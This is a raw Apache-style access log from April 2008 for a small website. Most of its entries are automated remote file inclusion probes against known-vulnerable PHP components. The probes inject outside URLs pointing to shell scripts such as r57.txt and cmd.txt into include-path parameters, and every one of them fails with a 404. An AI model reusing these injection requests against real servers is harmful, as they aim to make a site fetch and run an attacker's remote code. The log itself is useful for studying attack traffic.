89.108.66.169 - - [06/Apr/2008:18:34:49 -0700] "GET /logs/access_071119.log//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:18:35:41 -0700] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:18:35:41 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:18:35:46 -0700] "GET /logs/access_071022.log/index.php?body=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:18:35:46 -0700] "GET /logs/index.php?body=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:18:35:49 -0700] "GET /logs/access_071015.log/index.php?body=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:18:36:44 -0700] "GET /logs/access_080303.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.37.186.93 - - [06/Apr/2008:18:39:34 -0700] "GET /logs/access_080224.log//components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.191.104.52 - - [06/Apr/2008:18:48:44 -0700] "GET /logs/access_071203.log/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.191.104.52 - - [06/Apr/2008:18:48:44 -0700] "GET /logs/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.191.104.52 - - [06/Apr/2008:18:49:24 -0700] "GET /logs/access_071224.log/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
200.105.35.14 - - [06/Apr/2008:18:49:29 -0700] "GET /ashnews.php?pathtoashnews=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
85.10.128.138 - - [06/Apr/2008:18:50:11 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.10.128.138 - - [06/Apr/2008:18:50:11 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:53:15 -0700] "GET /logs/access_080114.log//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:53:16 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:53:16 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:53:16 -0700] "GET /logs/access_080114.log//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:53:17 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:53:17 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
203.146.251.182 - - [06/Apr/2008:18:54:39 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.toulouseangloexchange.com"
203.146.251.182 - - [06/Apr/2008:18:54:39 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:55:11 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:55:56 -0700] "GET /logs/access_080211.log//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:56:00 -0700] "GET /logs/access_080211.log//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:18:56:08 -0700] "GET /logs/access_080303.log/modifyform.html?code=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:18:56:08 -0700] "GET /modifyform.html?code=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:18:56:08 -0700] "GET /logs/modifyform.html?code=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.173.177.11 - - [06/Apr/2008:18:58:37 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
213.173.177.11 - - [06/Apr/2008:18:58:37 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
210.192.125.88 - - [06/Apr/2008:19:01:36 -0700] "GET /logs/appserv/main.php?appserv_root=http://kazehime.110mb.com/cmd/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.10.128.138 - - [06/Apr/2008:19:05:53 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.10.128.138 - - [06/Apr/2008:19:05:54 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.10.128.138 - - [06/Apr/2008:19:05:55 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.10.128.138 - - [06/Apr/2008:19:05:55 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:19:06:42 -0700] "GET /logs/access.log/index.php?visualizar=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:19:06:42 -0700] "GET /index.php?visualizar=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:19:06:42 -0700] "GET /logs/index.php?visualizar=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:19:08:02 -0700] "GET /logs/access_080128.log/index.php?visualizar=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.74.65.15 - - [06/Apr/2008:19:09:45 -0700] "GET /[Scriptftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.74.65.15 - - [06/Apr/2008:19:09:45 -0700] "GET /[Scriptftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
201.63.191.212 - - [06/Apr/2008:19:10:11 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.jef.at/sp/vnc/r57.txt?? HTTP/1.1" 404 275 "-" "-" "www.toulouseangloexchange.com"
85.10.128.138 - - [06/Apr/2008:19:12:17 -0700] "GET /logs/admin.php?include_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.10.128.138 - - [06/Apr/2008:19:12:17 -0700] "GET /admin.php?include_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
203.146.251.182 - - [06/Apr/2008:19:13:01 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.toulouseangloexchange.com"
203.146.251.182 - - [06/Apr/2008:19:13:01 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:19:16:10 -0700] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:19:16:10 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:19:16:11 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:19:17:20 -0700] "GET /logs/access_080303.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.63.191.212 - - [06/Apr/2008:19:17:21 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jef.at/sp/vnc/r57.txt?? HTTP/1.1" 404 275 "-" "-" "www.toulouseangloexchange.com"
213.16.114.162 - - [06/Apr/2008:19:22:23 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.105.35.14 - - [06/Apr/2008:19:23:12 -0700] "GET /logs/access.log/ashnews.php?pathtoashnews=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
200.105.35.14 - - [06/Apr/2008:19:23:13 -0700] "GET /logs/ashnews.php?pathtoashnews=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
85.10.128.138 - - [06/Apr/2008:19:24:56 -0700] "GET /logs/admin.php?include_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.10.128.138 - - [06/Apr/2008:19:24:56 -0700] "GET /admin.php?include_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:19:29:01 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.232.102.34 - - [06/Apr/2008:19:29:57 -0700] "GET /logs/access_080303.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.102.34 - - [06/Apr/2008:19:29:57 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.102.34 - - [06/Apr/2008:19:29:57 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.102.34 - - [06/Apr/2008:19:30:00 -0700] "GET /logs/access_080225.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:19:30:05 -0700] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:19:30:05 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:19:30:05 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:19:30:10 -0700] "GET /logs/access_080303.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.52.169.116 - - [06/Apr/2008:19:31:06 -0700] "GET /cutenews//show_archives.php?cutepath=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.6.8.94 - - [06/Apr/2008:19:33:24 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
74.6.28.183 - - [06/Apr/2008:19:33:25 -0700] "GET /?D=A HTTP/1.0" 200 903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:19:34:15 -0700] "GET /logs/access_080225.log//atom.php5?page=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:19:34:15 -0700] "GET //atom.php5?page=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:19:34:15 -0700] "GET /logs//atom.php5?page=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.72.221.90 - - [06/Apr/2008:19:35:47 -0700] "GET /components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.133.218 - - [06/Apr/2008:19:36:00 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.toulouseangloexchange.com"
85.234.133.218 - - [06/Apr/2008:19:36:00 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:19:36:38 -0700] "GET /logs/access.log//atom.php5?page=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.208.231.141 - - [06/Apr/2008:19:37:44 -0700] "GET /logs/access_080211.log/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.208.231.141 - - [06/Apr/2008:19:37:45 -0700] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.208.231.141 - - [06/Apr/2008:19:37:45 -0700] "GET /logs/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.98.140.99 - - [06/Apr/2008:19:38:32 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://irc0de.runhost.net/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
66.98.140.99 - - [06/Apr/2008:19:38:35 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://irc0de.runhost.net/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.toulouseangloexchange.com"
66.98.140.99 - - [06/Apr/2008:19:38:36 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://irc0de.runhost.net/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
200.105.35.14 - - [06/Apr/2008:19:38:42 -0700] "GET /logs/access_080225.log/ashnews.php?pathtoashnews=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.98.140.99 - - [06/Apr/2008:19:38:44 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://irc0de.runhost.net/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.toulouseangloexchange.com"
88.208.231.141 - - [06/Apr/2008:19:40:56 -0700] "GET /logs/access_080303.log/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.6.8.106 - - [06/Apr/2008:19:41:13 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
74.6.27.48 - - [06/Apr/2008:19:41:14 -0700] "GET /?D=D HTTP/1.0" 200 903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:19:41:51 -0700] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:19:41:52 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.208.231.141 - - [06/Apr/2008:19:42:35 -0700] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:19:42:53 -0700] "GET /logs/access_080303.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [06/Apr/2008:19:42:59 -0700] "GET //common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [06/Apr/2008:19:42:59 -0700] "GET /logs/access_080121.log//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [06/Apr/2008:19:43:00 -0700] "GET //common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [06/Apr/2008:19:43:00 -0700] "GET /logs//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [06/Apr/2008:19:43:09 -0700] "GET /logs/access_080204.log//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.34.169.20 - - [06/Apr/2008:19:45:14 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.246.192.39 - - [06/Apr/2008:19:45:33 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
203.146.251.123 - - [06/Apr/2008:19:46:38 -0700] "GET /logs/access_080204.log/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
203.146.251.123 - - [06/Apr/2008:19:46:39 -0700] "GET /components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
203.146.251.123 - - [06/Apr/2008:19:46:39 -0700] "GET /logs/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
203.146.251.123 - - [06/Apr/2008:19:47:18 -0700] "GET /logs/access_080225.log/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
67.195.37.125 - - [06/Apr/2008:19:48:10 -0700] "GET /?D=A HTTP/1.0" 200 903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
64.34.169.20 - - [06/Apr/2008:19:49:03 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
64.34.169.20 - - [06/Apr/2008:19:49:03 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
64.34.169.20 - - [06/Apr/2008:19:49:03 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
72.29.67.38 - - [06/Apr/2008:19:49:08 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.67.38 - - [06/Apr/2008:19:49:09 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.192.39 - - [06/Apr/2008:19:50:26 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.192.39 - - [06/Apr/2008:19:50:26 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.192.39 - - [06/Apr/2008:19:50:26 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.52.169.116 - - [06/Apr/2008:19:51:59 -0700] "GET /admin.php?include_path=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:19:52:51 -0700] "GET /logs/access_080225.log/samplefaqsupport.php?path[docroot]=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
